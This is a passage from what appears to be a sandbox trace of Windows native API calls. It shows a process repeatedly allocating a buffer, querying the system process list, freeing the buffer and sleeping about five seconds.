RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.862] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.956] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.964] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.985] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.992] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.006] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.012] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.041] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.067] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 